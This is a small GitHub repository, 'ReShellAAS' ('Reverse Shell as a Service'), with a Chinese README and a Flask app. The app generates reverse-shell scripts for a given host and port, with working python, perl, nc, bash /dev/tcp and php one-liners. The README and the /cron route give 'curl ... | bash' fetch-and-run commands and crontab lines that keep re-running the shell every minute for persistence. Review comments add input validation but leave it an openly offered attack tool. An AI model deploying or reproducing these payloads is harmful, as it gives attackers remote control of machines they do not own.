├── .gitignore ├── LICENSE ├── README.md └── app.py /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | *$py.class 5 | 6 | # C extensions 7 | *.so 8 | 9 | # Distribution / packaging 10 | .Python 11 | build/ 12 | develop-eggs/ 13 | dist/ 14 | downloads/ 15 | eggs/ 16 | .eggs/ 17 | lib/ 18 | lib64/ 19 | parts/ 20 | sdist/ 21 | var/ 22 | wheels/ 23 | *.egg-info/ 24 | .installed.cfg 25 | *.egg 26 | MANIFEST 27 | 28 | # PyInstaller 29 | # Usually these files are written by a python script from a template 30 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 31 | *.manifest 32 | *.spec 33 | 34 | # Installer logs 35 | pip-log.txt 36 | pip-delete-this-directory.txt 37 | 38 | # Unit test / coverage reports 39 | htmlcov/ 40 | .tox/ 41 | .coverage 42 | .coverage.* 43 | .cache 44 | nosetests.xml 45 | coverage.xml 46 | *.cover 47 | .hypothesis/ 48 | .pytest_cache/ 49 | 50 | # Translations 51 | *.mo 52 | *.pot 53 | 54 | # Django stuff: 55 | *.log 56 | local_settings.py 57 | db.sqlite3 58 | 59 | # Flask stuff: 60 | instance/ 61 | .webassets-cache 62 | 63 | # Scrapy stuff: 64 | .scrapy 65 | 66 | # Sphinx documentation 67 | docs/_build/ 68 | 69 | # PyBuilder 70 | target/ 71 | 72 | # Jupyter Notebook 73 | .ipynb_checkpoints 74 | 75 | # pyenv 76 | .python-version 77 | 78 | # celery beat schedule file 79 | celerybeat-schedule 80 | 81 | # SageMath parsed files 82 | *.sage.py 83 | 84 | # Environments 85 | .env 86 | .venv 87 | env/ 88 | venv/ 89 | ENV/ 90 | env.bak/ 91 | venv.bak/ 92 | 93 | # Spyder project settings 94 | .spyderproject 95 | .spyproject 96 | 97 | # Rope project settings 98 | .ropeproject 99 | 100 | # mkdocs documentation 101 | /site 102 | 103 | # mypy 104 | .mypy_cache/ 105 | -------------------------------------------------------------------------------- /LICENSE: 
-------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2018 童话 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 
22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # ReShellAAS 2 | Reverse Shell as a Service 3 | 反弹shell即服务 4 | 5 | # 项目简介 6 | 无需再去记住复杂的反弹shell命令,通过Reverse Shell as a Service可以方便、快捷的创建反弹shell脚本。 7 | 8 | # 安装及服务端启动方法 9 | ``` 10 | pip3 install flask 11 | python3 app.py 12 | ``` 13 | 14 | # 使用方法 15 | ## Attacker Machine 16 | ``` 17 | nc -l 1337 18 | ``` 19 | 20 | ## Target Machine 21 | ``` 22 | curl http://reshell.tk/ip/1337 | bash 23 | 或者 24 | while true; do curl http://reshell.tk/ip/1337 | bash; done 25 | ``` 26 | 配合crontab使用效果更佳 27 | ``` 28 | crontab -e 29 | * * * * * /usr/bin/curl http://reshell.tk/ip/1337 | bash 30 | ``` 31 | 32 | # 致谢 33 | 感谢P师傅以及P师傅的知识星球以及原创这个点子的小机灵鬼。 34 | 35 | # TODO 36 | - 适应多场景的反弹shell语法 37 | - etc... 38 | 39 | -------------------------------------------------------------------------------- /app.py: -------------------------------------------------------------------------------- 1 | """ 2 | Reverse Shell as a Service 3 | """ 4 | from flask import Flask 5 | from flask import make_response 6 | 7 | app = Flask(__name__) 8 | 9 | usgae = \ 10 | """# Reverse Shell as a Service 11 | # https://github.com/omg2hei/ReShellAAS 12 | # 13 | # 1. On Attacker Machine: 14 | # nc -l 1337 15 | # 16 | # 2. On The Target Machine: 17 | # curl http://reshell.tk/ip/1337 | bash 18 | # 19 | # 3. Enjoy it. 
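"""
# (the line above closes the ``usgae`` banner string that starts further up)

# Characters accepted in the ``host`` path segment: enough for IPv4 literals
# and DNS names, nothing that a shell interprets.  Both path values are spliced
# verbatim into one-liners that the *target* pipes into ``bash``, so quotes,
# ``$``, ``;``, whitespace, IPv6 brackets etc. are refused outright.
_HOST_CHARS = frozenset(
    "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789.-"
)
_MAX_HOST_LEN = 253  # DNS name length limit
_BAD_HOST = "host must be an IPv4 address or hostname ([A-Za-z0-9.-])"
_BAD_PORT = "port must be an integer between 1 and 65535"


def _parse_target(host, port):
    """Validate the ``host``/``port`` URL segments and return ``(host, port_int)``.

    ``port`` is returned as an ``int`` so that only the canonical decimal form
    (never the raw segment) reaches the generated script.

    Raises:
        ValueError: with a short user-facing reason when either value is unsafe.
    """
    if not host or len(host) > _MAX_HOST_LEN or not set(host) <= _HOST_CHARS:
        raise ValueError(_BAD_HOST)
    if not str(port).isdigit():  # rejects '', '+80', ' 80', '8_0', '-1'
        raise ValueError(_BAD_PORT)
    port_num = int(port)
    if not 1 <= port_num <= 65535:
        raise ValueError(_BAD_PORT)
    return host, port_num


def _plain_text(body, status=200):
    """Build a ``text/plain`` response; ``curl | bash`` ignores the status code."""
    response = make_response(body, status)
    response.headers["content-type"] = "text/plain"
    return response


def reverse_shell_payload(host, port):
    """Return ``{interpreter: one-liner}`` reverse-shell commands for ``host:port``.

    The dict keys double as the binary names probed with ``command -v`` in
    ``generate_shell_script``; insertion order is the preference order.
    Every one-liner execs an interactive ``/bin/sh`` wired to a TCP socket.
    Callers must pass values already checked by ``_parse_target``: the strings
    are built with plain ``%`` interpolation and are not escaped here.
    """
    target = {'host': host, 'port': port}
    payload = {
        'python': """python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("%(host)s",%(port)s)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'""" % target,
        'perl': """perl -e 'use Socket;$i="%(host)s";$p=%(port)s;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'""" % target,
        # NOTE(review): fixed, predictable fifo path in /tmp (no cleanup, no
        # per-run name) -- fine for a lab box, noisy and clobber-prone elsewhere.
        'nc': """rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc %(host)s %(port)s >/tmp/f""" % target,
        # Relies on bash's /dev/tcp; ``command -v sh`` does not prove that.
        'sh': """/bin/sh -i >& /dev/tcp/%(host)s/%(port)s 0>&1""" % target,
        'php': """php -r '$sock=fsockopen("%(host)s",%(port)s);exec("/bin/sh -i <&3 >&3 2>&3");'""" % target,  # untested (assumes the socket lands on fd 3)
    }
    return payload


def generate_shell_script(host, port):
    """Return a shell script that runs the first available payload for ``host:port``.

    Each candidate is guarded by ``command -v <name>`` and followed by ``exit``
    so at most one interpreter is launched.  The script begins with a newline
    and each stanza is separated by one, matching the original output.
    """
    payload = reverse_shell_payload(host, port)
    stanza = """
if command -v %(key)s > /dev/null 2>&1; then
    %(payload)s
    exit;
fi
"""
    return "".join(
        stanza % {'key': key, 'payload': command}
        for key, command in payload.items()
    )


# NOTE(review): the listing this was recovered from showed the second route as
# '//' -- the <host>/<port> converters are restored from the handler's signature
# and the README's ``curl http://.../ip/1337`` example.
@app.route('/')
@app.route('/<host>/<port>')
def main(host=None, port=None):
    """Serve the usage banner at ``/``, or banner + script at ``/<host>/<port>``.

    Both segments are attacker-supplied (anyone can hit this URL) and end up
    inside shell one-liners, so they are validated first.  A rejected target
    gets HTTP 400 whose body is a ``#`` comment line: a caller that blindly
    pipes the response into ``bash`` then executes nothing.
    """
    if host is None or port is None:
        return _plain_text(usgae)
    try:
        host, port_num = _parse_target(host, port)
    except ValueError as err:
        return _plain_text("# error: %s\n" % err, 400)
    return _plain_text(usgae + generate_shell_script(host, port_num))


@app.route('/cron')
def cron():
    """Return a crontab line that re-fetches and runs a shell script every minute.

    NOTE(review): the callback URL is hard-coded to ``googlelog.tk`` over plain
    HTTP, which is neither this service nor the ``reshell.tk`` host used in the
    README and banner -- confirm it is intentional, and consider deriving the
    host from the request / taking ``host``/``port`` like ``main`` does.
    """
    crontab_text = "* * * * * /usr/bin/curl http://googlelog.tk/googlelog.tk/443 | bash\n"
    return _plain_text(crontab_text)


if __name__ == '__main__':
    # Flask's development server, bound on every interface, plain HTTP on a
    # privileged port (needs root / CAP_NET_BIND_SERVICE).  Anything on the
    # path can rewrite the script a target pipes into bash; put TLS or a
    # reverse proxy in front for anything beyond a lab.  Debug mode is off,
    # which is what you want on 0.0.0.0.
    app.run(host='0.0.0.0', port=80)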